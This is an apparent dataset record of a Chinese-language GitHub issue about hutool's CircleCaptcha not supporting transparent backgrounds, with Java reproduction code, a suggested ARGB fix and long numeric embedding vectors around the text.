0.028297899290919304, -0.003124269424006343, 0.004028617404401302, -0.011618866585195065, 0.0006752116023562849, 0.012915273196995258, -0.002998810727149248, 0.020170966163277626, -0.019501853734254837, 0.0024725813418626785, 0.00640536192804575, 0.005025316495448351, -0.009611528366804123, 0.00017054537602234632, 0.009332730434834957, -0.027991222217679024, 0.014818063005805016, -0.006140504963696003, 0.00014037865912541747, -0.0024464440066367388, -0.015264137648046017, -0.020617041736841202, -0.008308151736855507, 0.012671325355768204, 0.0074369111098349094, -0.0070117455907166, -0.013507716357707977, 0.01356347557157278, -0.003312457352876663, 0.016950860619544983, -0.0306119155138731, -0.002857669722288847, 0.007896926254034042, -0.0031660888344049454, -0.007646008860319853, -0.022429222241044044, -0.015250197611749172, 0.010963693261146545, 0.005297143943607807, 0.004439842887222767, 0.0003441401058807969, -0.016560543328523636, 0.0017607775516808033, -0.020045507699251175, -0.010942784138023853, 0.009228182025253773, 0.0018731675809249282, -0.019097596406936646, -0.0162678062915802, -0.002355834934860468, 0.012998911552131176, 0.011465528048574924, 0.009785776026546955, -0.02807486243546009, 0.0003297646180726588, -0.00018666332471184433, -0.013661054894328117, -0.004164530895650387, -0.01957155205309391, 0.00018633661966305226, 0.01347286719828844, -0.028883373364806175, -0.0069768959656357765, 0.005272748880088329, -0.01785694994032383, -0.04168015718460083, 0.0001788221561582759, -0.01354953646659851, 0.0031434365082532167, -0.003648756304755807, -0.0031991959549486637, -0.007144174072891474, 0.017132077366113663, 0.022861357778310776, -0.002605009824037552, 0.007903896272182465, 0.003296775044873357, -0.0026276621501892805, 0.0022251489572227, 0.0074857003055512905, 0.007297512609511614, -0.014009551145136356, -0.007471760734915733, 0.017717551440000534, -0.01032245997339487, -0.011660685762763023, 0.011144911870360374, -0.006886286661028862, 0.01798240840435028, -0.004108771216124296, 0.00497652729973197, -0.014943521469831467, -0.013800453394651413, 0.004174985457211733, 0.009869415313005447, 0.000016036274246289395, 0.011249460279941559, 0.007255692966282368, 0.010789445601403713, 0.02039400301873684, 0.002690391382202506, 0.006847952492535114, 0.013173160143196583, 0.0018801374826580286, 0.002913429168984294, 0.023558350279927254, -0.006349602714180946, 0.013626204803586006, 0.00023196784604806453, -0.011883723549544811, 0.015570814721286297, 0.00422029010951519, 0.011590986512601376, -0.012162520550191402, -0.003648756304755807, -0.009890325367450714, 0.026611177250742912, -0.024325041100382805, 0.012343739159405231, 0.015417476184666157, 0.017759371548891068, -0.010064573027193546, -0.02000368759036064, -0.009750926867127419, -0.011124001815915108, 0.015389596112072468, -0.01663024351000786, -0.0007431683479808271, 0.00851724948734045, -0.01074762549251318, -0.01693692058324814, 0.007896926254034042, 0.02256862074136734, -0.008154813200235367, 0.022484980523586273, 0.0006760827964171767, -0.013500746339559555, -0.004621061030775309, 0.013849242590367794, 0.001642288756556809, -0.005548060871660709, 0.014636844396591187, -0.0009243864333257079, 0.007555399555712938, 0.030723433941602707, 0.016825402155518532, 0.020770380273461342, -0.0014584569726139307, -0.012225249782204628, -0.014483505859971046, -0.020630981773138046, 0.012664355337619781, -0.017146017402410507, -0.01605870947241783, -0.0030493426602333784, 0.0055062416940927505, -0.017020558938384056, 0.0409831665456295, 0.002892519347369671, -0.0014427746646106243, -0.02431110106408596, 0.012678295373916626, -0.019097596406936646, -0.0023645474575459957, 0.018024228513240814, 0.023837147280573845, -0.005349418148398399, 0.00027705455431714654, 0.0028437296859920025, -0.011709475889801979, 0.001822635647840798, 0.03733092173933983, -0.010371250100433826, 0.015765972435474396, -0.0030197203159332275, 0.004161045886576176, -0.013619235716760159, 0.030193720012903214, 0.0012885651085525751, 0.005656094755977392, -0.010134272277355194, 0.003408293705433607, 0.018052108585834503, 0.008677558042109013, -0.011772205121815205, -0.017048439010977745, 0.02999856136739254, 0.009562738239765167, -0.01880485936999321, 0.005356388166546822, 0.01137491874396801, -0.014664724469184875, -0.0024394739884883165, 0.012901333160698414, -0.0012702690437436104, 0.01394682191312313, -0.004436357878148556, -0.008294211700558662, 0.015696274116635323, 0.01757815293967724, 0.023655928671360016, 0.007283572573214769, -0.0025893275160342455, 0.010998543351888657, 0.0005907012382522225, -0.006621429696679115, 0.002857669722288847, 0.007987535558640957, 0.015166559256613255, 0.004244684707373381, 0.007443881127983332, 0.0008459747768938541, 0.015849610790610313, -0.007980565540492535, 0.00023349252296611667, -0.010064573027193546, 0.002625919645652175, 0.004878947976976633, 0.00796662550419569, -0.0063635422848165035, 0.025370530784130096, -0.00427256477996707, -0.02641601860523224, -0.015682334080338478, 0.0025509928818792105, 0.023920785635709763, 0.03250773623585701, 0.023070454597473145, 0.029273688793182373, 0.0018278630450367928, -0.018972137942910194, 0.02397654578089714, 0.01669994182884693, -0.029580365866422653, -0.003979827743023634, 0.015570814721286297, 0.008893625810742378, 0.02938520722091198, 0.016225988045334816, 0.006471576169133186, 0.009346670471131802, 0.01452532596886158, -0.010914904065430164, 0.03875278681516647, -0.0009287426364608109, -0.02228982374072075, 0.017257535830140114, -0.008552099578082561, 0.03292592987418175, -0.02008732594549656, -0.009667287580668926, 0.007534489966928959, -0.011716445907950401, 0.004474692512303591, 0.03473811224102974, -0.008112994022667408, -0.010148212313652039, -0.0022809081710875034, 0.045666955411434174, -0.015208378434181213, -0.006419301964342594, 0.030137959867715836, -0.01186281442642212, 0.015166559256613255, -0.013033761642873287, 0.007422971073538065, -0.0008673201664350927, 0.015891430899500847, -0.009890325367450714, -0.005070621147751808, 0.03195014223456383, 0.014706543646752834, 0.004983496852219105, -0.009060903452336788, -0.01688116043806076, -0.00977183599025011, -0.009660317562520504, 0.009207271970808506, 0.005582910496741533, -0.003997252322733402, 0.00242379168048501, -0.02254074066877365, -0.018721221014857292, -0.00718599371612072, -0.016797522082924843, -0.02054734155535698, -0.00552715128287673, 0.003854369046166539, -0.005122895818203688, 0.011249460279941559, -0.02223406359553337, -0.002781000453978777, 0.007506610359996557, 0.005488816648721695, -0.012552836909890175, -0.00828724168241024, 0.023140154778957367, 0.017355116084218025, -0.007091899868100882, -0.01042700931429863, -0.003235788084566593, -0.0009784033754840493, -0.04614090919494629, -0.01339619792997837, -0.019487913697957993, 0.01152825728058815, 0.01688116043806076, 0.01975277066230774, -0.0020596131216734648, 0.011186731047928333, 0.00472560990601778, 0.007077959831804037, -0.01249010767787695, -0.002617207122966647, -0.016825402155518532, 0.025482049211859703, -0.004882432986050844, 0.023502590134739876, -0.003502387786284089, -0.02825607918202877, 0.016002949327230453, -0.013159220106899738, 0.0028419874142855406, 0.019278815016150475, 0.009736986830830574, -0.006816587410867214, -0.010057603009045124, -0.017633913084864616, 0.004335294011980295, -0.0028994891326874495, -0.015975071117281914, -0.014608965255320072, 0.00010356874554418027, -0.0005532378563657403, 0.016072649508714676, -0.027531208470463753, 0.02008732594549656, 0.0016048254910856485, -0.007646008860319853, -0.0028419874142855406, 0.002338410122320056, 0.02966400422155857, -0.0017538076499477029, 0.00114306784234941, -0.019501853734254837, -0.005764128640294075, -0.036522410809993744, 0.0001192510753753595, 0.011779175139963627, -0.018553942441940308, -0.0050880457274615765, -0.007102354429662228, 0.006210204213857651, -0.016895100474357605, -0.014288348145782948, -0.0015072465175762773, 0.0028960041236132383, 0.025844484567642212, -0.018107866868376732, -0.013228919357061386, -0.017773311585187912, 0.025217192247509956, 0.020045507699251175, 0.004053012002259493, -0.005168200004845858, -0.007123264484107494, 0.01090096402913332, 0.01715995743870735, -0.009060903452336788, -0.023042574524879456, 0.013033761642873287, -0.04583423212170601, -0.0009226439287886024, 0.009060903452336788, 0.017717551440000534, 0.010169122368097305, -0.01636538654565811, 0.007297512609511614, 0.0014366760151460767, 0.012204340659081936, 0.0038020946085453033, 0.006001106463372707, -0.009520919062197208, -0.003634816501289606, -0.013654084876179695, 0.00851724948734045, 0.04865008220076561, -0.0038961886893957853, 0.04669850319623947, 0.0057397340424358845, -0.0037707299925386906, 0.004084376618266106, -0.010517618618905544, -0.012037062086164951, 0.0027130437083542347, -0.007234783377498388, 0.014455626718699932, 0.024227462708950043, 0.0037533051799982786, -0.011716445907950401, 0.009576678276062012, -0.0018487728666514158, -0.009820626117289066, -0.007165083661675453, -0.007241752929985523, 0.0032566979061812162, -0.003476250683888793, 0.007646008860319853, 0.004607120994478464, -0.005945346783846617, 0.013661054894328117, -0.003899673465639353, 0.0027966827619820833, 0.012741024605929852, 0.033316247165203094, -0.014636844396591187, 0.010336400009691715, -0.035212066024541855, 0.015250197611749172, 0.007074474822729826, 0.015096860006451607, 0.003443143330514431, 0.0067503731697797775, 0.01012033224105835, 0.0034100362099707127, 0.018944257870316505, -0.0021084025502204895, -0.005614275578409433, -0.0014392896555364132, 0.014567145146429539, -0.029887042939662933, -0.015068979933857918, 0.0008128675981424749, 0.012371618300676346, -0.011075212620198727, -0.0008712407434359193, 0.018414543941617012, 0.020770380273461342, 0.003816034412011504, 0.01218343060463667, -0.009472128935158253, 0.014762302860617638, -0.020533401519060135, 0.019864289090037346, 0.025607507675886154, -0.006116109900176525, -0.007687828503549099, 0.011981302872300148, -0.009987903758883476, -0.00572579400613904, 0.0072487229481339455, 0.008175723254680634, -0.0170344989746809, 0.01580779254436493, 0.006262478418648243, 0.017912710085511208, -0.002970930887386203, 0.01499928068369627, 0.007834197022020817, -0.00937455054372549, -0.009932144545018673, 0.012796783819794655, 0.006478546187281609, 0.00718599371612072, -0.004223775118589401, -0.016532665118575096, 0.012364648282527924, 0.019334575161337852, 0.011660685762763023, 0.004652425646781921, 0.006109139882028103, -0.010545497760176659, -0.000017724303688737564, 0.0027182712219655514, -0.013424077071249485, 0.0011674625566229224, 0.0033107148483395576, -0.02546810917556286, 0.004844098351895809, 0.01128431037068367, 0.00010770713561214507, -0.009674257598817348, -0.009304851293563843, -0.0005275362636893988, -0.02103523723781109, 0.013298618607223034, 0.01073368638753891, 0.006865377072244883, 0.001534254988655448, -0.03412475809454918, -0.019836409017443657, -0.0029796434100717306, -0.010329429991543293, -0.005108955781906843, -0.009283941239118576, -0.016616303473711014, -0.023767447099089622, -0.008524219505488873, 0.018358785659074783, 0.010650047101080418, -0.004303929395973682, 0.0009261289378628135, 0.007304482627660036, -0.016435084864497185, -0.011744325049221516, -0.010127302259206772, 0.01890243962407112, 0.0005144676542840898, -0.01593325100839138, 0.0012868226040154696, 0.005230929236859083, 0.018177567049860954, 0.011597956530749798, -0.01596113108098507, 0.016839340329170227, 0.022275883704423904, 0.014873822219669819, -0.0018679401837289333, 0.003969372715801001, -0.013681964948773384, -0.010057603009045124, 0.005736249033361673, 0.017452694475650787, 0.021300094202160835, 0.01105430256575346, 0.009123632684350014, -0.014302288182079792, -0.013382257893681526, 0.0030545699410140514, 0.03373444080352783, -0.003174801357090473, -0.010810354724526405, -0.03063979372382164, 0.006865377072244883, -0.019000018015503883, -0.0031138143967837095, 0.005460937041789293, -0.007374181877821684, 0.022178305312991142, -0.006119594909250736, 0.020840078592300415, -0.0033804140985012054, -0.002300075488165021, 0.010761565528810024, -0.011918573640286922, 0.011179761029779911, 0.007001290563493967, 0.005338963121175766, 0.017327236011624336, -0.002538795582950115, -0.013918941840529442, 0.005694429390132427, 0.0126155661419034, 0.014162889681756496, -0.015166559256613255, -0.01137491874396801, -0.006593550089746714, -0.010831264778971672, 0.005572455935180187, 0.006691128946840763, -0.0022373462561517954, -0.0002347993868170306, 0.019585492089390755, -0.017564212903380394, 0.012901333160698414, -0.014427746646106243, 0.0064018769189715385, 0.015417476184666157, 0.004791824147105217, 0.0033699593041092157, -0.02605358324944973, 0.004878947976976633, 0.014330167323350906, 0.003071994986385107, -0.017466634511947632, 0.012622536160051823, 0.014009551145136356, 0.011946452781558037, -0.018916379660367966, -0.029775524511933327, 0.019892169162631035, -0.002110145054757595, -0.01859576255083084, 0.0005963642615824938, -0.007820256985723972, -0.005129865370690823, 0.017382996156811714, -0.019223056733608246, 0.020630981773138046, -0.0028960041236132383, -0.008322091773152351, 0.01898607797920704 ]
null
null
null
null
null
null
null
null
null
[ "dromara", "hutool" ]
### 版本情况 JDK版本: openjdk 17.0.9 dragonwell hutool版本: 5.8.27(请确保最新尝试是否还有问题) ### 问题描述(包括截图) 1. 复现代码 ```java package com.example; import java.awt.Color; import cn.hutool.captcha.CircleCaptcha; import cn.hutool.captcha.generator.MathGenerator; public class Main { public static void main(String[] args) { MathGenerator mathGenerator = new MathGenerator(1); CircleCaptcha circleCaptcha = new CircleCaptcha(130, 25, 0, 0); circleCaptcha.setGenerator(mathGenerator); circleCaptcha.setBackground(new Color(255, 255, 255, 0)); circleCaptcha.write("./captcha.png"); } } ``` 2. 输出图片 ![captcha](https://github.com/dromara/hutool/assets/56566522/82c6dc36-e9bd-499a-93e8-b8adfc5c3fb3) 3. 我们需要的效果 ![captcha](https://github.com/dromara/hutool/assets/56566522/d5ffb4fe-123b-47ad-8e83-8fc1ce4219bc) 4. 可选的解决方案 在阅读源码的时候,发现`CircleCaptcha`类的`createImage`函数中创建了`BufferedImage`对象,并设定了`BufferedImage.TYPE_INT_RGB`,改成`BufferedImage.TYPE_INT_ARGB`就可以实现了(59行)。 其他类型的验证码也有一样的问题,有机会的话可以顺便改下😄。
[Hutool-Captcha] 无法生成透明背景的验证码
https://api.github.com/repos/dromara/hutool/issues/3558/comments
1
2024-04-24T06:32:50
2024-04-25T01:04:37Z
https://github.com/dromara/hutool/issues/3558
2,260,465,578
3,558
false
This is a GitHub Issue repo:hutool owner:dromara Title : [Hutool-Captcha] 无法生成透明背景的验证码 Issue date: --- start body --- ### 版本情况 JDK版本: openjdk 17.0.9 dragonwell hutool版本: 5.8.27(请确保最新尝试是否还有问题) ### 问题描述(包括截图) 1. 复现代码 ```java package com.example; import java.awt.Color; import cn.hutool.captcha.CircleCaptcha; import cn.hutool.captcha.generator.MathGenerator; public class Main { public static void main(String[] args) { MathGenerator mathGenerator = new MathGenerator(1); CircleCaptcha circleCaptcha = new CircleCaptcha(130, 25, 0, 0); circleCaptcha.setGenerator(mathGenerator); circleCaptcha.setBackground(new Color(255, 255, 255, 0)); circleCaptcha.write("./captcha.png"); } } ``` 2. 输出图片 ![captcha](https://github.com/dromara/hutool/assets/56566522/82c6dc36-e9bd-499a-93e8-b8adfc5c3fb3) 3. 我们需要的效果 ![captcha](https://github.com/dromara/hutool/assets/56566522/d5ffb4fe-123b-47ad-8e83-8fc1ce4219bc) 4. 可选的解决方案 在阅读源码的时候,发现`CircleCaptcha`类的`createImage`函数中创建了`BufferedImage`对象,并设定了`BufferedImage.TYPE_INT_RGB`,改成`BufferedImage.TYPE_INT_ARGB`就可以实现了(59行)。 其他类型的验证码也有一样的问题,有机会的话可以顺便改下😄。 --- end body ---
1,192
[ 0.026216108351945877, -0.05035250261425972, 0.005067470949143171, 0.023477330803871155, 0.042912401258945465, -0.012771198526024818, 0.009446586482226849, 0.036731842905282974, -0.029233157634735107, -0.007015371695160866, 0.0005318281473591924, 0.011504330672323704, 0.00015504026669077575, -0.0034838863648474216, -0.012192687019705772, 0.05184638127684593, -0.00033571082167327404, 0.023081891238689423, -0.015715017914772034, -0.03488646447658539, -0.02675800584256649, -0.016579125076532364, -0.008787522092461586, 0.03766917809844017, 0.009204929694533348, 0.007864831946790218, -0.008538542315363884, 0.016432667151093483, -0.023565204814076424, -0.0026911785826087, 0.02158801257610321, 0.0019698694813996553, 0.009468555450439453, 0.040569059550762177, 0.01122605986893177, -0.018893172964453697, 0.0015890769427642226, 0.05474626272916794, -0.03904588893055916, -0.004001983907073736, 0.006275755353271961, -0.06854267418384552, 0.000318089994834736, 0.023184413090348244, -0.03532584011554718, -0.03307037428021431, -0.04124277085065842, 0.008933980949223042, -0.01981586217880249, -0.008428698405623436, 0.022906141355633736, -0.025264127179980278, -0.003628514474257827, -0.012800490483641624, 0.014814297668635845, 0.019845154136419296, -0.001143293222412467, 0.035208672285079956, 0.009710212238132954, -0.013342387974262238, -0.031078536063432693, 0.01105763204395771, -0.008377437479794025, 0.03561875596642494, 0.0026399181224405766, -0.013774440623819828, -0.028603384271264076, 0.035003628581762314, -0.007527977228164673, 0.036936886608600616, -0.0021749117877334356, -0.006740761920809746, 0.043293192982673645, 0.012763875536620617, 0.02234959788620472, 0.010318015702068806, 0.0770372748374939, 0.0019277626415714622, -0.019976967945694923, 0.012881043367087841, -0.05782189592719078, 0.0193911325186491, -0.04387902840971947, -0.005290820728987455, -0.0036596369463950396, -0.022422827780246735, -0.04279523342847824, -0.06356307864189148, -0.02264251559972763, 0.019464362412691116, -0.011409132741391659, 0.013898930512368679, 0.017794732004404068, -0.02699233964085579, 0.0012833443470299244, 0.028486218303442, -0.014470119960606098, -0.02205668017268181, -0.0861177146434784, 0.004737939219921827, 0.015861477702856064, 0.0010242955759167671, -0.021265802904963493, 0.010735423304140568, 0.0516999214887619, -0.010237463749945164, 0.045109279453754425, -0.01728212647140026, 0.0215294286608696, 0.0799078717827797, -0.016828104853630066, -0.025498460978269577, -0.037112634629011154, -0.03184012323617935, -0.017501814290881157, 0.03143003582954407, -0.0016128764254972339, -0.016022581607103348, 0.004250963684171438, -0.00255387369543314, -0.013532783836126328, -0.023726310580968857, -0.0024092455860227346, 0.009607691317796707, -0.05284230038523674, 0.029072051867842674, -0.004661048296838999, 0.020094133913517, -0.0022554639726877213, -0.010654870420694351, -0.005726535338908434, 0.015466039068996906, 0.030229076743125916, 0.014609255827963352, 0.02962859533727169, -0.009724858216941357, -0.004895382095128298, 0.032806750386953354, -0.026142878457903862, 0.03298249840736389, -0.023140475153923035, -0.0507332943379879, -0.01299821026623249, -0.01478500571101904, -0.05331096798181534, 0.02302330732345581, -0.011445747688412666, 0.011387163773179054, -0.002486136509105563, 0.027446361258625984, -0.033334001898765564, -0.03526725620031357, 0.012741907499730587, 0.036116715520620346, 0.02699233964085579, -0.03804996982216835, -0.009995806030929089, 0.021705180406570435, -0.0154367471113801, -0.03772776201367378, 0.005056486930698156, 0.01612510345876217, 0.01996232196688652, -0.04332248494029045, -0.01110889296978712, -0.052725132554769516, -0.009139022789895535, 0.02063603140413761, -0.0217784084379673, 0.02785644493997097, -0.019742632284760475, 0.041154894977808, 0.017267480492591858, 0.009388002566993237, -0.0526372566819191, 0.01476303767412901, 0.0041521042585372925, -0.015304934233427048, 0.00345825613476336, -0.026347920298576355, -0.03945597633719444, 0.011021017096936703, 0.026245400309562683, 0.00511140888556838, 0.033861253410577774, -0.05805623158812523, 0.03336329385638237, 0.0029346663504838943, -0.00828223954886198, -0.01170205045491457, 0.011064955033361912, 0.027915028855204582, 0.015260997228324413, -0.037171218544244766, 0.038079261779785156, -0.003892139997333288, -0.03172295540571213, -0.07006584107875824, -0.0017547582974657416, 0.004115489777177572, -0.022569285705685616, -0.0044852979481220245, -0.028295820578932762, -0.04159427061676979, -0.007842863909900188, 0.01258812565356493, -0.02728525549173355, 0.0208117812871933, 0.023872768506407738, -0.053486719727516174, -0.05336955189704895, 0.015085246413946152, -0.001092032645829022, -0.018439151346683502, 0.0022719406988471746, 0.0026893478352576494, 0.007231398485600948, 0.000024257222321466543, -0.01857096329331398, -0.009563753381371498, 0.0020064841955900192, -0.004185057245194912, -0.0008879058877937496, 0.008794845081865788, -0.03380266949534416, -0.035003628581762314, -0.0193911325186491, 0.018073003739118576, -0.022437473759055138, -0.02833975851535797, 0.035296548157930374, -0.0179558377712965, -0.000740074145141989, -0.013210575096309185, 0.05609368160367012, 0.018541671335697174, -0.006583318579941988, 0.022334951907396317, 0.013957514427602291, -0.013701211661100388, 0.017399294301867485, 0.01728212647140026, -0.017208898440003395, -0.037405554205179214, 0.014243109151721, 0.009973837994039059, 0.01302017830312252, -0.04264877364039421, -0.010625578463077545, 0.008436021395027637, 0.018746713176369667, 0.0017099053366109729, -0.046925369650125504, -0.00046866785851307213, 0.007187461014837027, 0.005807087756693363, 0.027592819184064865, 0.009431940503418446, 0.0017813040176406503, -0.011050309054553509, 0.048741456121206284, 0.028705906122922897, -0.04443557187914848, 0.00034440678427927196, 0.006334338802844286, -0.03722980245947838, -0.016828104853630066, 0.017018500715494156, 0.020841073244810104, 0.001946069998666644, 0.006846944335848093, -0.06485191732645035, -0.011914415284991264, 0.014199171215295792, -0.004045921843498945, 0.020167363807559013, -0.01631549932062626, -0.004474313464015722, 0.046837493777275085, -0.004382776562124491, -0.008245624601840973, 0.013562075793743134, 0.0416528545320034, 0.011028340086340904, -0.020225947722792625, -0.039133764803409576, -0.036497507244348526, -0.015568559989333153, -0.04071551933884621, 0.011035663075745106, -0.014623901806771755, 0.011921738274395466, -0.0349450446665287, -0.034622836858034134, 0.021836992353200912, -0.0013638966483995318, -0.017121022567152977, -0.004130135290324688, 0.0020174686796963215, -0.034681420773267746, -0.022627869620919228, -0.05345742776989937, -0.028515510261058807, -0.010845267213881016, 0.031986579298973083, 0.03728838637471199, 0.018497733399271965, -0.0029767730738967657, 0.01555391401052475, -0.01122605986893177, 0.040656935423612595, -0.015993289649486542, 0.007630498614162207, 0.013400970958173275, -0.021412262693047523, -0.024370728060603142, -0.01578824780881405, -0.009351388551294804, -0.055595722049474716, 0.0008979749400168657, -0.03957314044237137, 0.0033593964762985706, -0.02937961556017399, 0.009878639131784439, 0.022466765716671944, 0.02703627571463585, -0.03670255094766617, 0.0021035131067037582, 0.0019222705159336329, 0.007784279994666576, 0.010398567654192448, -0.018937110900878906, -0.016681646928191185, -0.0019936691969633102, 0.022701099514961243, -0.0045548658818006516, 0.004569511394947767, -0.012917657382786274, 0.0014078342355787754, -0.004558526910841465, -0.005272513255476952, 0.02488333359360695, -0.010435182601213455, -0.01217804104089737, 0.015290288254618645, -0.06444182991981506, 0.029613949358463287, 0.01074274629354477, 0.026816587895154953, 0.02899882383644581, 0.0009922577301040292, -0.01241969782859087, 0.006308708805590868, 0.011248028837144375, -0.003130554687231779, -0.0014975402737036347, 0.004283917136490345, 0.007106908597052097, -0.009505169466137886, 0.018600255250930786, 0.019068922847509384, -0.04256089776754379, -0.001313551445491612, -0.03049270249903202, 0.024194978177547455, 0.0018472103402018547, -0.008216333575546741, 0.02680194191634655, -0.030990662053227425, -0.007436440791934729, -0.02604035660624504, 0.010947788134217262, -0.041711438447237015, 0.03353904187679291, -0.017487168312072754, -0.015509977005422115, -0.03564804792404175, -0.007938061840832233, -0.022027388215065002, 0.015202413313090801, -0.023462684825062752, -0.005217591300606728, 0.009226898662745953, -0.008955949917435646, 0.01804371178150177, 0.049649499356746674, -0.010808652266860008, -0.01871742308139801, 0.034622836858034134, -0.013130023144185543, -0.03933880850672722, -0.0025044437497854233, -0.012038905173540115, -0.02072390727698803, -0.015202413313090801, 0.08207545429468155, 0.019127506762742996, 0.007414471823722124, 0.027358485385775566, -0.05193425714969635, -0.02063603140413761, 0.016740228980779648, 0.029980096966028214, 0.011233382858335972, -0.009409971535205841, -0.009878639131784439, 0.0020339451730251312, -0.03025836870074272, 0.0035259933210909367, 0.00010475229646544904, 0.019112860783934593, -0.0100470669567585, -0.00494298106059432, 0.013481523841619492, -0.02158801257610321, 0.01905427686870098, 0.04461131989955902, -0.005481217056512833, 0.018922464922070503, -0.04141852259635925, 0.009578399360179901, -0.00691651226952672, 0.0015790079487487674, 0.008699647150933743, 0.0036303449887782335, -0.013986806385219097, 0.023711664602160454, 0.0555078499019146, 0.052959468215703964, -0.022964725270867348, -0.0020504218991845846, -0.015627143904566765, 0.02268645353615284, -0.010318015702068806, -0.018644193187355995, 0.027915028855204582, 0.008772876113653183, -0.015671081840991974, 0.004452344495803118, 0.005162669345736504, -0.003467409871518612, 0.05867135524749756, -0.005411649122834206, -0.008750907145440578, -0.023081891238689423, -0.03134216368198395, -0.01612510345876217, 0.0009995806030929089, -0.009849348105490208, 0.0011918076779693365, -0.022232431918382645, 0.02986292913556099, -0.01612510345876217, -0.01618368737399578, -0.017208898440003395, -0.028544800356030464, -0.036497507244348526, 0.020548155531287193, 0.032338082790374756, 0.014418859034776688, -0.023872768506407738, 0.027680695056915283, -0.02977505512535572, -0.013108054175972939, 0.02095824107527733, 0.018204817548394203, -0.0033081360161304474, -0.0186734851449728, 0.026025710627436638, -0.013320419006049633, 0.003674282692372799, 0.020328467711806297, 0.06625791639089584, 0.03474000468850136, 0.003939738962799311, 0.015041308477520943, -0.01524635124951601, -0.0015359856188297272, 0.016447313129901886, -0.02139761671423912, 0.010845267213881016, -0.06121973693370819, -0.003873832756653428, 0.008941303938627243, 0.032133039087057114, 0.018658839166164398, 0.03705405071377754, -0.004320531617850065, -0.017164960503578186, 0.00047599078970961273, -0.009395325556397438, 0.020504217594861984, 0.0070190331898629665, 0.007901446893811226, -0.004338839091360569, -0.001636676024645567, -0.024180332198739052, -0.04915153980255127, 0.02546916902065277, 0.0144774429500103, 0.027387777343392372, -0.042619481682777405, -0.024678291752934456, -0.022364243865013123, 0.07399093359708786, -0.011431101709604263, 0.0032934900373220444, 0.030141200870275497, -0.048507124185562134, 0.018512379378080368, 0.004115489777177572, -0.0186734851449728, -0.006828636862337589, -0.04033472761511803, 0.024663645774126053, -0.013642627745866776, -0.011379840783774853, 0.0014371260767802596, 0.008230979554355145, -0.011123538948595524, -0.019317902624607086, -0.0184245053678751, -0.000624737876933068, 0.016857396811246872, 0.027212027460336685, 0.023726310580968857, 0.04317602515220642, -0.000371181289665401, 0.02732919342815876, -0.020885011181235313, 0.02044563554227352, -0.004119150806218386, 0.034915756434202194, 0.012654031626880169, -0.001715397578664124, 0.012463635765016079, 0.01000312902033329, -0.013606013730168343, 0.008933980949223042, 0.014924141578376293, -0.015583205968141556, 0.019464362412691116, 0.00626843236386776, 0.001470079179853201, -0.0036870979238301516, -0.017604336142539978, -0.05254938080906868, 0.015627143904566765, 0.000627026311121881, 0.0215294286608696, 0.015568559989333153, -0.002306724665686488, 0.00016899961337912828, 0.014938787557184696, -0.012038905173540115, 0.0012375760124996305, 0.010720777325332165, -0.0007689081830903888, -0.0039873383939266205, 0.01088920421898365, -0.016769520938396454, 0.010274077765643597, 0.019303256645798683, -0.006945803761482239, 0.025337355211377144, 0.02690446376800537, 0.027651403099298477, 0.007289981935173273, -0.03263099864125252, -0.03216233104467392, 0.017457878217101097, 0.00414111977443099, -0.011592206545174122, -0.023286933079361916, -0.004174073226749897, 0.009636982344090939, -0.011482362635433674, 0.010588964447379112, -0.02369701862335205, 0.017970483750104904, 0.022291013970971107, -0.03292391821742058, -0.010969757102429867, 0.016051873564720154, 0.01129928883165121, -0.003203784115612507, -0.01045715156942606, -0.015773601830005646, -0.035589464008808136, -0.015451393090188503, -0.004895382095128298, 0.021192574873566628, 0.012082843109965324, 0.00255570444278419, 0.044054776430130005, -0.011072278022766113, 0.015568559989333153, 0.04900508373975754, 0.007667113095521927, -0.015202413313090801, -0.019376486539840698, -0.008223656564950943, 0.03933880850672722, -0.01637408323585987, -0.027124151587486267, -0.018175525590777397, 0.018658839166164398, 0.003947061952203512, -0.007542623206973076, 0.004100843798369169, 0.005931577645242214, 0.02110469900071621, 0.03512079641222954, 0.013210575096309185, 0.019889092072844505, -0.002881574910134077, 0.021573366597294807, 0.023345516994595528, -0.0007034594309516251, -0.03353904187679291, 0.015231705270707607, -0.07463535666465759, 0.023799538612365723, 0.03225020691752434, 0.02790038287639618, 0.00045219124876894057, -0.013335064984858036, -0.028164008632302284, -0.007352226879447699, -0.0037035744171589613, -0.037259094417095184, -0.007180138025432825, -0.013379002921283245, -0.014946110546588898, -0.032718874514102936, 0.010515734553337097, 0.011555591598153114, -0.018131587654352188, -0.009351388551294804, -0.007304627913981676, -0.007231398485600948, -0.007487701252102852, -0.010237463749945164, -0.0024495217949151993, -0.0203431136906147, 0.006671193987131119, -0.014638547785580158, 0.03632175922393799, 0.005246883258223534, 0.02608429454267025, -0.03222091495990753, -0.012383082881569862, -0.032865334302186966, 0.018073003739118576, 0.0010169725865125656, -0.005528816021978855, 0.014850912615656853, 0.0536038838326931, 0.0014462796971201897, -0.010310692712664604, -0.02502979151904583, 0.017692212015390396, 0.020182009786367416, -0.003613868495449424, -0.01804371178150177, 0.05199284106492996, -0.007205768022686243, -0.024238916113972664, 0.04121347889304161, -0.002323201159015298, 0.013525460846722126, -0.0010993556352332234, -0.0010673177894204855, 0.015334226191043854, 0.0030408487655222416, -0.01129196584224701, 0.04273664951324463, -0.004148442763835192, -0.02306724525988102, 0.01247095875442028, 0.01785331591963768, 0.002149281557649374, 0.004661048296838999, 0.012976241298019886, 0.0047196317464113235, -0.005598383955657482, -0.028207946568727493, 0.02522018924355507, 0.0030738019850105047, -0.015905415639281273, 0.007820894941687584, 0.014221140183508396, -0.00212914333678782, 0.010925819166004658, -0.011306611821055412, 0.003668790450319648, -0.03403700143098831, -0.01833662949502468, -0.004928335547447205, -0.017589690163731575, -0.02302330732345581, 0.019757278263568878, -0.025337355211377144, 0.03450566902756691, -0.013210575096309185, 0.03427133709192276, 0.01234646886587143, 0.0009510662057437003, -0.013100731186568737, -0.0008133034571073949, 0.005162669345736504, 0.028837718069553375, 0.01258812565356493, 0.011255350895226002, -0.03752271831035614, -0.027651403099298477, 0.0067004854790866375, -0.010435182601213455, -0.032513830810785294, -0.003410656936466694, -0.021500136703252792, 0.012046228162944317, -0.03315825015306473, -0.023667726665735245, 0.023989936336874962, 0.017384648323059082, 0.02488333359360695, 0.012771198526024818, 0.03892872482538223, 0.00751333124935627, -0.022188493981957436, -0.005971853621304035, 0.006488120649009943, 0.006187880411744118, -0.011680081486701965, 0.019976967945694923, 0.014946110546588898, -0.0100543899461627, 0.009102408774197102, -0.01574430987238884, -0.0289548859000206, 0.034622836858034134, -0.017824023962020874, -0.034681420773267746, 0.008472636342048645, -0.021573366597294807, -0.04844854027032852, 0.027417069301009178, -0.0014975402737036347, -0.000013802016837871633, 0.026963047683238983, -0.026596900075674057, 0.006641902029514313, 